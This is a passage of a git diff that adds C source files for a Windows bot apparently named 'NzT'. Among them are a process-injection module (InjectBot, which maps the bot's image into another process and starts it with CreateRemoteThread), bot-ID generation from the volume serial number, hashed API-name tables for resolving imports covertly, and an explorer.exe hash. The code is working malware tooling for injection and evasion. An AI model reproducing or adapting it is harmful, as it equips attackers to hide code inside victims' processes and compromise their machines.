FileRead(FileHandle, Buffer, FileSize, Length); + return Status; +} + +BOOL FileCreateDirectory(CONST LPWSTR Path) +{ + NTSTATUS Status; + IO_STATUS_BLOCK IO; + OBJECT_ATTRIBUTES OA; + UNICODE_STRING US; + HANDLE Handle; + BOOL bStatus = FALSE; + + MemoryZero(&IO, sizeof(IO)); + MemoryZero(&OA, sizeof(OA)); + + OA.Attributes = OBJ_CASE_INSENSITIVE; + OA.Length = sizeof(OA); + API(RtlInitUnicodeString)(&US, Path); + OA.ObjectName = &US; + + Status = API(NtCreateFile)(&Handle, GENERIC_WRITE, &OA, &IO, NULL, FILE_ATTRIBUTE_NORMAL, 0, FILE_CREATE, FILE_DIRECTORY_FILE, NULL, 0); + + if (NT_SUCCESS(Status)) + { + bStatus = TRUE; + API(NtClose)(Handle); + } + + return bStatus; +} + +BOOL FileDelete(CONST LPWSTR Path) +{ + BOOL Status = FALSE; + OBJECT_ATTRIBUTES OA; + UNICODE_STRING US; + + MemoryZero(&OA, sizeof(OBJECT_ATTRIBUTES)); + + OA.Attributes = OBJ_CASE_INSENSITIVE; + OA.Length = sizeof(OA); + API(RtlInitUnicodeString)(&US, Path); + OA.ObjectName = &US; + + if (API(NtDeleteFile)(&OA) >= 0) + Status = TRUE; + + return Status; +} + +BOOL FileCopy(CONST LPWSTR OriginalPath, CONST LPWSTR NewPath, BOOL DeleteOriginal) +{ + BOOL Status = FALSE; + LPVOID File; + DWORD FileSize; + + if (!FileReadBuffer(OriginalPath, &File, &FileSize)) + return Status; + + if (!FileWriteBuffer(NewPath, File, FileSize, TRUE)) + return Status; + + if (DeleteOriginal) + FileDelete(OriginalPath); + + Free(File); + + return Status; +} + +BOOL IsValidNtPath(const LPWSTR Path) +{ + BOOL Status = FALSE; + LPWSTR Data; + + if ((Data = StringCopyW(Path, 4)) != 0) + { + Status = StringCompareW(Path, L"\\??\\"); + Free(Data); + } + + return Status; +} + +BOOL DosPathToNtPath(LPWSTR* Path) +{ + LPWSTR NtPath = NULL; + + if (IsValidNtPath(*Path)) + return TRUE; + + if (StringConcatW(&NtPath, L"\\??\\") && StringConcatW(&NtPath, *Path)) + { + Free(*Path); + *Path = NtPath; + return TRUE; + } + + if (NtPath != NULL) + Free(NtPath); + + return FALSE; +} \ No newline at end of file diff --git a/src/Shared/file.h b/src/Shared/file.h new file mode 100644 index 0000000..d85e43c --- /dev/null +++ b/src/Shared/file.h @@ -0,0 +1,16 @@ +#ifndef __FILE_H__ +#define __FILE_H__ + +BOOL FileGetInfo(HANDLE FileHandle, PFILE_STANDARD_INFORMATION Info); +BOOL FileGetSize(HANDLE FileHandle, PDWORD FileSize); +BOOL FileOpen(HANDLE* FileHandle, CONST LPWSTR Path, ACCESS_MASK AccessMask, ULONG CreateDisposition); +BOOL FileWrite(HANDLE FileHandle, CONST LPVOID Buffer, DWORD Length); +BOOL FileRead(HANDLE FileHandle, LPVOID* Buffer, DWORD Length, PDWORD ReadLength); +BOOL FileWriteBuffer(CONST LPWSTR Path, CONST LPVOID Buffer, DWORD Length, BOOL Append); +BOOL FileReadBuffer(CONST LPWSTR Path, LPVOID* Buffer, PDWORD Length); +BOOL FileCreateDirectory(const LPWSTR Path); +BOOL FileDelete(CONST LPWSTR Path); +BOOL FileCopy(CONST LPWSTR OriginalPath, CONST LPWSTR NewPath, BOOL DeleteOriginal); +BOOL DosPathToNtPath(LPWSTR* Path); + +#endif \ No newline at end of file diff --git a/src/Shared/guid.c b/src/Shared/guid.c new file mode 100644 index 0000000..5fe955a --- /dev/null +++ b/src/Shared/guid.c @@ -0,0 +1,79 @@ +#include "nzt.h" +#include "guid.h" +#include "crt.h" +#include "utils.h" + +static DWORD GuidRandom(PDWORD Seed) +{ + return(*Seed = 1664525 * (*Seed)); +} + +VOID GuidGenerate( + GUID * Guid, + PDWORD Seed +) +{ + Guid->Data1 = GuidRandom(Seed); + Guid->Data2 = (DWORD)GuidRandom(Seed); + Guid->Data3 = (DWORD)GuidRandom(Seed); + + for (DWORD i = 0; i < 8; i++) + Guid->Data4[i] = (UCHAR)GuidRandom(Seed); +} + +LPTSTR GuidGenerateEx(PDWORD Seed) +{ + ULONG Length = GUID_STR_LENGTH + 1; + LPTSTR GuidString, Name = NULL; + GUID Guid; + + GuidGenerate(&Guid, Seed); + if (GuidString = GuidToString(&Guid)) + { + if (Name = (LPTSTR)Malloc(Length * sizeof(TCHAR))) + { + Name[0] = 0; + StringConcatA(&Name, GuidString); + } + + Free(GuidString); + } + + return (Name); +} + +VOID GuidFillName( + PDWORD Seed, + LPTSTR GuidName +) +{ + GUID Guid; + ULONG Size = 0; + + GuidGenerate(&Guid, Seed); + Size = NzT.Api.pwsprintfA(GuidName, GUID_STR_FORMAT, Guid.Data1, Guid.Data2, Guid.Data3, *(PDWORD)&Guid.Data4[0], *(PDWORD)&Guid.Data4[2], *(PDWORD)&Guid.Data4[6]); +} + +ULONG GuidToBuffer( + GUID* Guid, + LPTSTR Buffer +) +{ + return (NzT.Api.pwsprintfA(Buffer, GUID_STR_FORMAT, htonS(Guid->Data1), htonS(Guid->Data2), htonS(Guid->Data3), htonS(*(PDWORD)&Guid->Data4[0]), + htonL(*(PDWORD)&Guid->Data4[2]), htonS(*(PDWORD)&Guid->Data4[6]))); +} + +LPTSTR GuidToString(GUID *Guid) +{ + LPTSTR String = NULL; + + if (String = (LPTSTR)Malloc((GUID_STR_LENGTH + 1) * sizeof(TCHAR))) + GuidToBuffer(Guid, String); + + return (String); +} + +LPTSTR GetBotGuid() +{ + return GuidGenerateEx(GetSerialNumber()); +} \ No newline at end of file diff --git a/src/Shared/guid.h b/src/Shared/guid.h new file mode 100644 index 0000000..5bf1329 --- /dev/null +++ b/src/Shared/guid.h @@ -0,0 +1,42 @@ +#ifndef _GUID_H_ +#define _GUID_H_ + +/* Defines */ +#define GUID_STR_LENGTH 16*2+4+2 +#define GUID_STR_FORMAT ("%04X%04X%04X%04X%08X%04X") + +/* Structures */ +typedef union _GUID_EX +{ + GUID Guid; + struct + { + DWORD Data1; + DWORD Data2; + DWORD Data3; + DWORD Data4; + }; +}GUID_EX, *PGUID_EX; + +/* Functions */ +VOID GuidGenerate( + GUID* Guid, + PDWORD Seed +); + +VOID GuidFillName( + PDWORD Seed, + LPTSTR GuidName +); + +ULONG GuidToBuffer( + GUID* Guid, + LPTSTR Buffer +); + +LPTSTR GuidToString(GUID *Guid); + +LPTSTR GetBotGuid(); + + +#endif \ No newline at end of file diff --git a/src/Shared/hashes.h b/src/Shared/hashes.h new file mode 100644 index 0000000..f7293d1 --- /dev/null +++ b/src/Shared/hashes.h @@ -0,0 +1,6 @@ +#ifndef __HASHES_H__ +#define __HASHES_H__ + +#define HASH_EXPLORER_EXE 0x095e2844 + +#endif \ No newline at end of file diff --git a/src/Shared/hook.c b/src/Shared/hook.c new file mode 100644 index 0000000..e4ca9cf --- /dev/null +++ b/src/Shared/hook.c @@ -0,0 +1,7 @@ +#include +#include + +#include "hook.h" +#include "crt.h" + + diff --git a/src/Shared/hook.h b/src/Shared/hook.h new file mode 100644 index 0000000..de7f90f --- /dev/null +++ b/src/Shared/hook.h @@ -0,0 +1,21 @@ +#ifndef __HOOK_H__ +#define __HOOK_H__ + + +typedef struct +{ + CHAR* DLL; + CHAR* Name; + LPVOID Proxy; + LPVOID Original; + DWORD Length; +} HOOKS, PHOOKS; + +typedef int (WINAPI *pOldMessageBoxA)(HWND hWnd, LPCSTR lpText, LPCTSTR lpCaption, UINT uType); + +int HookedMessageBoxA(HWND hWnd, LPCSTR lpText, LPCTSTR lpCaption, UINT uType); + +BOOL HookFunction(PCHAR DLL, PCHAR Name, LPVOID Proxy, LPVOID Original, PDWORD Length); +BOOL UnhookFunction(PCHAR DLL, PCHAR Name, LPVOID Proxy, LPVOID Original, PDWORD Length); +#endif + diff --git a/src/Shared/injection.c b/src/Shared/injection.c new file mode 100644 index 0000000..8bc365d --- /dev/null +++ b/src/Shared/injection.c @@ -0,0 +1,181 @@ +#include + +#include "nzt.h" +#include "utils.h" + +LPVOID GetImageBase(LPVOID ProcessAddress) +{ + LPBYTE Address = (LPBYTE)ProcessAddress; + Address = (LPBYTE)((SIZE_T)Address & 0xFFFFFFFFFFFF0000); + + for (;;) + { + PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)Address; + if (DosHeader->e_magic == IMAGE_DOS_SIGNATURE) + { + if (DosHeader->e_lfanew < 0x1000) + { + PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)&((unsigned char*)Address)[DosHeader->e_lfanew]; + if (NtHeaders->Signature == IMAGE_NT_SIGNATURE) + break; + } + } + + Address -= 0x1000; + } + + return Address; +} + + +VOID ProcessRelocation(PIMAGE_BASE_RELOCATION Relocation, DWORD ImageBase, DWORD Delta, DWORD Size) +{ + PIMAGE_FIXUP_ENTRY Fixup; + DWORD PointerRva; + PIMAGE_BASE_RELOCATION LocalRelocation = Relocation; + + while ((DWORD)LocalRelocation - (DWORD)Relocation < Size) + { + if (!LocalRelocation->SizeOfBlock) + break; + + Fixup = (PIMAGE_FIXUP_ENTRY)((ULONG)LocalRelocation + sizeof(IMAGE_BASE_RELOCATION)); + for (ULONG r = 0; r < (LocalRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1; r++) + { + PointerRva = LocalRelocation->VirtualAddress + Fixup->Offset; + if (Fixup->Type == IMAGE_REL_BASED_HIGHLOW) + *(PULONG)((ULONG)ImageBase + PointerRva) += Delta; + + Fixup++; + } + + LocalRelocation = (PIMAGE_BASE_RELOCATION)((ULONG)LocalRelocation + LocalRelocation->SizeOfBlock); + } + + return; +} + +LPVOID InjectData( + HANDLE Process, + LPVOID Data, + DWORD Size +) +{ + LPVOID Address; + + if ((Address = NzT.Api.pVirtualAllocEx(Process, NULL, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL) + return NULL; + + if (!NzT.Api.pWriteProcessMemory(Process, Address, Data, Size, NULL)) + { + NzT.Api.pVirtualFreeEx(Process, Address, Size, MEM_RELEASE); + return NULL; + } + + return Address; +} + +DWORD InjectCode( + HANDLE Process, + LPVOID Function +) +{ + HANDLE Map, RemoteThread, Mutex, RemoteMutex; + DWORD Base, Size, ViewSize, NewBaseAddress, Address, ProcessId; + LPVOID View; + NTSTATUS Status; + PIMAGE_DOS_HEADER DosHeader; + PIMAGE_NT_HEADERS NtHeaders; + ULONG RelativeRva, RelativeSize; + + do + { + Map = 0; + RemoteThread = 0; + View = NULL; + Mutex = 0; + RemoteMutex = 0; + + if ((ProcessId = GetProcessIdByHandle(Process)) == -1) + break; + + if ((Mutex = CreateMutexOfProcess(ProcessId)) == 0) + break; + + if (!API(DuplicateHandle)(API(GetCurrentProcess)(), Mutex, Process, &RemoteMutex, 0, FALSE, DUPLICATE_SAME_ACCESS)) + break; + + Base = (DWORD)GetImageBase(Function); + Size = ((PIMAGE_OPTIONAL_HEADER)((LPVOID)((PBYTE)(Base)+((PIMAGE_DOS_HEADER) + (Base))->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER))))->SizeOfImage; + + if ((Map = API(CreateFileMappingW)(NzT.Api.pGetCurrentProcess() + , NULL, PAGE_EXECUTE_READWRITE, 0, Size, NULL)) == 0) + break; + + if ((View = API(MapViewOfFile)(Map, FILE_MAP_WRITE, 0, 0, 0)) == NULL) + break; + + MemoryCopy(View, (LPVOID)Base, Size); + + ViewSize = 0; + NewBaseAddress = 0; + + if ((Status = (NTSTATUS)API(NtMapViewOfSection)(Map, Process, (PVOID*)&NewBaseAddress, 0, Size, + NULL, &ViewSize, (SECTION_INHERIT)1, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) + break; + + DosHeader = (PIMAGE_DOS_HEADER)Base; + NtHeaders = NtHeaders = (PIMAGE_NT_HEADERS)RVATOVA(Base, DosHeader->e_lfanew); + + RelativeRva = NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; + RelativeSize = NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + + ProcessRelocation((PIMAGE_BASE_RELOCATION)(Base + RelativeRva), (DWORD)View, NewBaseAddress - Base, RelativeSize); + + Address = (DWORD)Function - Base + NewBaseAddress; + } while (FALSE); + + if (Mutex != 0) + API(CloseHandle)(Mutex); + + if (Map != 0) + API(CloseHandle)(Map); + + if (RemoteThread != 0) + API(CloseHandle)(RemoteThread); + + if (View != NULL) + API(UnmapViewOfFile)(View); + + return Address; +} + +BOOL InjectBot(DWORD ProcessId, LPTHREAD_START_ROUTINE Thread) +{ + DWORD Address; + HANDLE RemoteThread, Process; + BOOL Injected = FALSE; + + if ((Process = NzT.Api.pOpenProcess(PROCESS_QUERY_INFORMATION | + PROCESS_VM_OPERATION | + PROCESS_VM_WRITE | + PROCESS_VM_READ | + PROCESS_CREATE_THREAD | + PROCESS_DUP_HANDLE + , FALSE, ProcessId)) == 0) + return FALSE; + + if ((Address = InjectCode(Process, Thread)) == 0) + return FALSE; + + if ((RemoteThread = NzT.Api.pCreateRemoteThread(Process, NULL, 0, (LPTHREAD_START_ROUTINE)Address, NULL, 0, NULL)) != 0) + { + NzT.Api.pCloseHandle(RemoteThread); + Injected = TRUE; + } + + NzT.Api.pCloseHandle(Process); + + return Injected; +} \ No newline at end of file diff --git a/src/Shared/injection.h b/src/Shared/injection.h new file mode 100644 index 0000000..27e39e9 --- /dev/null +++ b/src/Shared/injection.h @@ -0,0 +1,6 @@ +#ifndef __INJECTION_H__ +#define __INJECTION_H__ + +BOOL InjectBot(DWORD ProcessId, LPTHREAD_START_ROUTINE Thread); + +#endif //__INJECTION_H__ \ No newline at end of file diff --git a/src/Shared/kernel32_functions.h b/src/Shared/kernel32_functions.h new file mode 100644 index 0000000..4a98294 --- /dev/null +++ b/src/Shared/kernel32_functions.h @@ -0,0 +1,396 @@ +#ifndef __KERNEL32_FUNCTIONS_H__ +#define __KERNEL32_FUNCTIONS_H__ + +#include +#include + +typedef LPVOID(WINAPI* ptVirtualAlloc)( + _In_opt_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD flAllocationType, + _In_ DWORD flProtect + ); + +typedef HANDLE(WINAPI* ptOpenProcess)( + _In_ DWORD dwDesiredAccess, + _In_ BOOL bInheritHandle, + _In_ DWORD dwProcessId + ); + +typedef BOOL(WINAPI* ptProcess32FirstW)( + _In_ HANDLE hSnapshot, + _Out_ LPPROCESSENTRY32W lppe + ); + +typedef BOOL(WINAPI* ptProcess32NextW)( + _In_ HANDLE hSnapshot, + _Out_ LPPROCESSENTRY32W lppe + ); + +typedef BOOL(WINAPI* ptWriteProcessMemory)( + _In_ HANDLE hProcess, + _In_ LPVOID lpBaseAddress, + _In_ LPCVOID lpBuffer, + _In_ SIZE_T nSize, + _Out_ SIZE_T *lpNumberOfBytesWritten + ); + +typedef LPVOID(WINAPI* ptVirtualAllocEx)( + _In_ HANDLE hProcess, + _In_opt_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD flAllocationType, + _In_ DWORD flProtect + ); + +typedef BOOL(WINAPI* ptVirtualFree)( + _In_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD dwFreeType + ); + +typedef BOOL(WINAPI* ptVirtualFreeEx)( + _In_ HANDLE hProcess, + _In_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD dwFreeType + ); + +typedef BOOL(WINAPI* ptSetThreadContext)( + _In_ HANDLE hThread, + _In_ const CONTEXT *lpContext + ); + +typedef HANDLE(WINAPI* ptCreateRemoteThread)( + _In_ HANDLE hProcess, + _In_ LPSECURITY_ATTRIBUTES lpThreadAttributes, + _In_ SIZE_T dwStackSize, + _In_ LPTHREAD_START_ROUTINE lpStartAddress, + _In_ LPVOID lpParameter, + _In_ DWORD dwCreationFlags, + _Out_ LPDWORD lpThreadId + ); + +typedef BOOL(WINAPI* ptCloseHandle)( + _In_ HANDLE hObject + ); + +typedef HANDLE(WINAPI* ptCreateToolhelp32Snapshot)( + _In_ DWORD dwFlags, + _In_ DWORD th32ProcessID + ); + +typedef BOOL(WINAPI* ptCreateProcessW)( + _In_opt_ LPCWSTR lpApplicationName, + _Inout_opt_ LPWSTR lpCommandLine, + _In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes, + _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, + _In_ BOOL bInheritHandles, + _In_ DWORD dwCreationFlags, + _In_opt_ LPVOID lpEnvironment, + _In_opt_ LPCWSTR lpCurrentDirectory, + _In_ LPSTARTUPINFOW lpStartupInfo, + _Out_ LPPROCESS_INFORMATION lpProcessInformation + ); + +typedef BOOL(WINAPI* ptVirtualProtect)( + _In_ LPVOID lpAddress, + _In_ SIZE_T dwSize, + _In_ DWORD flNewProtect, + _Out_ PDWORD lpflOldProtect + ); + +typedef VOID(WINAPI* ptExitProcess)( + _In_ UINT uExitCode + ); + +typedef DWORD(WINAPI* ptGetModuleFileNameW)( + _In_opt_ HMODULE hModule, + _Out_writes_to_(nSize, ((return < nSize) ? (return +1) : nSize)) LPWSTR lpFilename, + _In_ DWORD nSize + ); + +typedef BOOL(WINAPI* ptDeleteFileW)( + _In_ LPCWSTR lpFileName + ); + +typedef VOID(WINAPI* ptSleep)( + _In_ DWORD dwMilliseconds + ); + +typedef HMODULE(WINAPI* ptLoadLibraryW)( + _In_ LPCWSTR lpLibFileName + ); + +typedef BOOL(WINAPI* ptIsWow64Process)( + _In_ HANDLE hProcess, + _Out_ PBOOL Wow64Process + ); + +typedef DWORD(WINAPI* ptGetCurrentProcessId)(VOID); + +typedef UINT(WINAPI* ptGetWindowsDirectoryW)( + _Out_writes_to_opt_(uSize, return +1) LPWSTR lpBuffer, + _In_ UINT uSize + ); + +typedef DWORD(WINAPI* ptResumeThread)( + _In_ HANDLE hThread + ); + +typedef DWORD(WINAPI* ptQueueUserAPC)( + _In_ PAPCFUNC pfnAPC, + _In_ HANDLE hThread, + _In_ ULONG_PTR dwData + ); + +typedef UINT(WINAPI* ptGetSystemDirectoryW)( + _Out_writes_to_opt_(uSize, return +1) LPWSTR lpBuffer, + _In_ UINT uSize + ); + +typedef HANDLE(WINAPI* ptFindFirstFileW)( + _In_ LPCWSTR lpFileName, + _Out_ LPWIN32_FIND_DATAW lpFindFileData + ); + +typedef BOOL(WINAPI* ptFindNextFileW)( + _In_ HANDLE hFindFile, + _Out_ LPWIN32_FIND_DATAW lpFindFileData + ); + +typedef HANDLE(WINAPI* ptCreateThread)( + _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes, + _In_ SIZE_T dwStackSize, + _In_ LPTHREAD_START_ROUTINE lpStartAddress, + _In_opt_ __drv_aliasesMem LPVOID lpParameter, + _In_ DWORD dwCreationFlags, + _Out_opt_ LPDWORD lpThreadId + ); + +typedef HANDLE(WINAPI* ptCreateFileW)( + _In_ LPCWSTR lpFileName, + _In_ DWORD dwDesiredAccess, + _In_ DWORD dwShareMode, + _In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes, + _In_ DWORD dwCreationDisposition, + _In_ DWORD dwFlagsAndAttributes, + _In_opt_ HANDLE hTemplateFile + ); + +typedef BOOL(WINAPI* ptWriteFile)( + _In_ HANDLE hFile, + _In_reads_bytes_opt_(nNumberOfBytesToWrite) LPCVOID lpBuffer, + _In_ DWORD nNumberOfBytesToWrite, + _Out_opt_ LPDWORD lpNumberOfBytesWritten, + _Inout_opt_ LPOVERLAPPED lpOverlapped + ); + +typedef BOOL(WINAPI* ptReadFile)( + _In_ HANDLE hFile, + _Out_writes_bytes_to_opt_(nNumberOfBytesToRead, *lpNumberOfBytesRead) __out_data_source(FILE) LPVOID lpBuffer, + _In_ DWORD nNumberOfBytesToRead, + _Out_opt_ LPDWORD lpNumberOfBytesRead, + _Inout_opt_ LPOVERLAPPED lpOverlapped + ); + +typedef DWORD(WINAPI* ptGetFileSize)( + _In_ HANDLE hFile, + _Out_opt_ LPDWORD lpFileSizeHigh + ); + +typedef BOOL(WINAPI* ptGetVersionExW)( + _Inout_ LPOSVERSIONINFOW lpVersionInformation + ); + +typedef HANDLE(WINAPI* ptFindFirstVolumeW)( + _Out_writes_(cchBufferLength) LPWSTR lpszVolumeName, + _In_ DWORD cchBufferLength + ); + +typedef BOOL(WINAPI* ptGetVolumeInformationW)( + _In_opt_ LPCWSTR lpRootPathName, + _Out_writes_opt_(nVolumeNameSize) LPWSTR lpVolumeNameBuffer, + _In_ DWORD nVolumeNameSize, + _Out_opt_ LPDWORD lpVolumeSerialNumber, + _Out_opt_ LPDWORD lpMaximumComponentLength, + _Out_opt_ LPDWORD lpFileSystemFlags, + _Out_writes_opt_(nFileSystemNameSize) LPWSTR lpFileSystemNameBuffer, + _In_ DWORD nFileSystemNameSize + ); + +typedef BOOL(WINAPI* ptFindVolumeClose)( + _In_ HANDLE hFindVolume + ); + +typedef int (WINAPI* ptwsprintfA)( + _Out_ LPSTR, + _In_ _Printf_format_string_ LPCSTR, + ...); + +typedef int (WINAPI* ptMultiByteToWideChar)( + _In_ UINT CodePage, + _In_ DWORD dwFlags, + _In_ LPCSTR lpMultiByteStr, + _In_ int cbMultiByte, + _Out_opt_ LPWSTR lpWideCharStr, + _In_ int cchWideChar + ); + +typedef HMODULE(WINAPI* ptGetModuleHandleW)( + _In_opt_ LPCWSTR lpModuleName + ); + +typedef BOOL(WINAPI* ptFlushInstructionCache)( + __in HANDLE hProcess, + __in_bcount_opt(dwSize) LPCVOID lpBaseAddress, + __in SIZE_T dwSize + ); + +typedef HANDLE(WINAPI* ptGetProcessHeap)(VOID); +typedef LPVOID(WINAPI* ptHeapAlloc)( + _In_ HANDLE hHeap, + _In_ DWORD dwFlags, + _In_ SIZE_T dwBytes + ); +typedef BOOL(WINAPI* ptHeapFree)( + _Inout_ HANDLE hHeap, + _In_ DWORD dwFlags, + LPVOID lpMem + ); + +typedef HANDLE(WINAPI* ptGetCurrentProcess)( + VOID + ); + +typedef BOOL(WINAPI* ptThread32First)( + HANDLE hSnapshot, + LPTHREADENTRY32 lpte + ); + +typedef BOOL(WINAPI* ptThread32Next)( + HANDLE hSnapshot, + LPTHREADENTRY32 lpte + ); + +typedef HANDLE(WINAPI* ptOpenMutexW)( + _In_ DWORD dwDesiredAccess, + _In_ BOOL bInheritHandle, + _In_ LPCWSTR lpName + ); + +typedef BOOL(WINAPI* ptReleaseMutex)( + _In_ HANDLE hMutex + ); + +typedef HANDLE(WINAPI* ptCreateMutexW)( + _In_opt_ LPSECURITY_ATTRIBUTES lpMutexAttributes, + _In_ BOOL bInitialOwner, + _In_opt_ LPCWSTR lpName + ); + +typedef SIZE_T(WINAPI* ptVirtualQuery)( + __in_opt LPCVOID lpAddress, + __out_bcount_part(dwLength, return) PMEMORY_BASIC_INFORMATION lpBuffer, + __in SIZE_T dwLength + ); + +typedef HANDLE(WINAPI* ptCreateFileMappingW)( + _In_ HANDLE hFile, + _In_opt_ LPSECURITY_ATTRIBUTES lpFileMappingAttributes, + _In_ DWORD flProtect, + _In_ DWORD dwMaximumSizeHigh, + _In_ DWORD dwMaximumSizeLow, + _In_opt_ LPCWSTR lpName + ); + +typedef LPVOID(WINAPI* ptMapViewOfFile)( + _In_ HANDLE hFileMappingObject, + _In_ DWORD dwDesiredAccess, + _In_ DWORD dwFileOffsetHigh, + _In_ DWORD dwFileOffsetLow, + _In_ SIZE_T dwNumberOfBytesToMap + ); + +typedef BOOL(WINAPI* ptUnmapViewOfFile)( + _In_ LPCVOID lpBaseAddress + ); + +typedef BOOL(WINAPI* ptDuplicateHandle)( + _In_ HANDLE hSourceProcessHandle, + _In_ HANDLE hSourceHandle, + _In_ HANDLE hTargetProcessHandle, + _Outptr_ LPHANDLE lpTargetHandle, + _In_ DWORD dwDesiredAccess, + _In_ BOOL bInheritHandle, + _In_ DWORD dwOptions + ); + +typedef HANDLE(WINAPI* ptGetCurrentThread)(VOID); +typedef BOOL(WINAPI* ptFlushFileBuffers)(HANDLE hFile); +typedef BOOL(WINAPI* ptDisconnectNamedPipe)(HANDLE hNamedPipe); +typedef FARPROC(WINAPI* ptGetProcAddress)(HMODULE hModule, LPCSTR lpProcName); +typedef void (WINAPI* ptRtlInitializeCriticalSection)(RTL_CRITICAL_SECTION* lpCriticalSection); +typedef void (WINAPI* ptRtlEnterCriticalSection)(RTL_CRITICAL_SECTION* lpCriticalSection); +typedef void (WINAPI* ptRtlLeaveCriticalSection)(RTL_CRITICAL_SECTION* lpCriticalSection); + +typedef int (WINAPI* ptWideCharToMultiByte)( + UINT CodePage, + DWORD dwFlags, + LPCWSTR lpWideCharStr, + int cchWideChar, + LPSTR lpMultiByteStr, + int cbMultiByte, + LPCSTR lpDefaultChar, + LPBOOL lpUsedDefaultChar); + +typedef BOOL(WINAPI* ptTerminateThread)( + _Inout_ HANDLE hThread, + _In_ DWORD dwExitCode +); + +typedef DWORD(WINAPI* ptGetTickCount)(VOID); + +typedef void (WINAPI* ptOutputDebugStringA)( + LPCSTR lpOutputString +); + +typedef void (WINAPI* ptOutputDebugStringW)( + LPCWSTR lpOutputString +); + +typedef DWORD(WINAPI* ptGetLastError)(); + +typedef HANDLE(WINAPI* ptCreateEventA)( + _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes, + _In_ BOOL bManualReset, + _In_ BOOL bInitialState, + _In_opt_ LPCSTR lpName + ); + +typedef HANDLE(WINAPI* ptCreateEventW)( + _In_opt_ LPSECURITY_ATTRIBUTES lpEventAttributes, + _In_ BOOL bManualReset, + _In_ BOOL bInitialState, + _In_opt_ LPCWSTR lpName + ); + +typedef BOOL(WINAPI* ptSetEvent)( + _In_ HANDLE hEvent +); + +typedef HANDLE(WINAPI* ptOpenEventA)( + _In_ DWORD dwDesiredAccess, + _In_ BOOL bInheritHandle, + _In_ LPCSTR lpName +); + +typedef HANDLE(WINAPI* ptOpenEventW)( + _In_ DWORD dwDesiredAccess, + _In_ BOOL bInheritHandle, + _In_ LPCWSTR lpName +); + + + +#endif __KERNEL32_FUNCTIONS_H__ \ No newline at end of file diff --git a/src/Shared/kernel32_hash.h b/src/Shared/kernel32_hash.h new file mode 100644 index 0000000..24e7d8b --- /dev/null +++ b/src/Shared/kernel32_hash.h @@ -0,0 +1,96 @@ +#ifndef __KERNEL32_HASH_H__ +#define __KERNEL32_HASH_H__ + +#define HASH_KERNEL32 0x2eca438c +#define HASH_KERNEL32_VIRTUALALLOC 0x09ce0d4a +#define HASH_KERNEL32_VIRTUALFREE 0xcd53f5dd +#define HASH_KERNEL32_GETMODULEFILENAMEW 0xfc6b42f1 +#define HASH_KERNEL32_ISWOW64PROCESS 0x2e50340b +#define HASH_KERNEL32_CREATETOOLHELP32SNAPSHOT 0xc1f3b876 +#define HASH_KERNEL32_PROCESS32FIRSTW 0x8197004c +#define HASH_KERNEL32_PROCESS32NEXTW 0xbc6b67bf +#define HASH_KERNEL32_CLOSEHANDLE 0xb09315f4 +#define HASH_KERNEL32_OPENPROCESS 0xdf27514b +#define HASH_KERNEL32_GETVERSIONEXW 0x2b53c31b +#define HASH_KERNEL32_FINDFIRSTFILEW 0x3d3f609f +#define HASH_KERNEL32_FINDNEXTFILEW 0x81f39c19 +#define HASH_KERNEL32_GETSYSTEMDIRECTORYW 0x72641c0b +#define HASH_KERNEL32_CREATETHREAD 0x906a06b0 +#define HASH_KERNEL32_CREATEREMOTETHREAD 0xff808c10 +#define HASH_KERNEL32_WRITEPROCESSMEMORY 0x4f58972e +#define HASH_KERNEL32_SLEEP 0xcef2eda8 +#define HASH_KERNEL32_LOADLIBRARYW 0xcb1508dc +#define HASH_KERNEL32_VIRTUALALLOCEX 0xe62e824d +#define HASH_KERNEL32_VIRTUALFREEEX 0x6b482023 +#define HASH_KERNEL32_FLUSHINSTRUCTIONCACHE 0xe9258e7a +#define HASH_KERNEL32_VIRTUALPROTECT 0x10066f2f +#define HASH_KERNEL32_GETCURRENTPROCESSID 0x1db413e3 +#define HASH_KERNEL32_CREATEMUTEXW 0x2d789102 +#define HASH_KERNEL32_OPENMUTEXW 0x0546114d +#define HASH_KERNEL32_RELEASEMUTEX 0x27ef86df +#define HASH_KERNEL32_GETVOLUMEINFORMATIONW 0xd52d474a +#define HASH_KERNEL32_FINDFIRSTVOLUMEW 0xdf55cbf2 +#define HASH_KERNEL32_FINDVOLUMECLOSE 0x8aa21257 +#define HASH_KERNEL32_GETLASTERROR 0xd2e536b7 +#define HASH_KERNEL32_OUTPUTDEBUGSTRINGA 0x2b0b47a5 +#define HASH_KERNEL32_OUTPUTDEBUGSTRINGW 0xdfdff2f4 +#define HASH_KERNEL32_CREATEFILEW 0xa1efe929 +#define HASH_KERNEL32_WRITEFILE 0xcce95612 +#define HASH_KERNEL32_WIDECHARTOMULTIBYTE 0x9a80e589 +#define HASH_KERNEL32_MODULE32FIRSTW 0x2735a2c6 +#define HASH_KERNEL32_MODULE32NEXTW 0xa29e8a1a +#define HASH_KERNEL32_CREATEPROCESSINTERNALW 0x7536a662 +#define HASH_KERNEL32_RESUMETHREAD 0x3872beb9 +#define HASH_KERNEL32_THREAD32FIRST 0x238b3114 +#define HASH_KERNEL32_THREAD32NEXT 0xf5197707 +#define HASH_KERNEL32_EXITPROCESS 0x251097cc +#define HASH_KERNEL32_DELETEFILEW 0x654fde9a +#define HASH_KERNEL32_SETTHREADCONTEXT 0x5688cbd8 +#define HASH_KERNEL32_CREATEPROCESSW 0x5c856c47 +#define HASH_KERNEL32_GETTHREADCONTEXT 0x649eb9c1 +#define HASH_KERNEL32_READPROCESSMEMORY 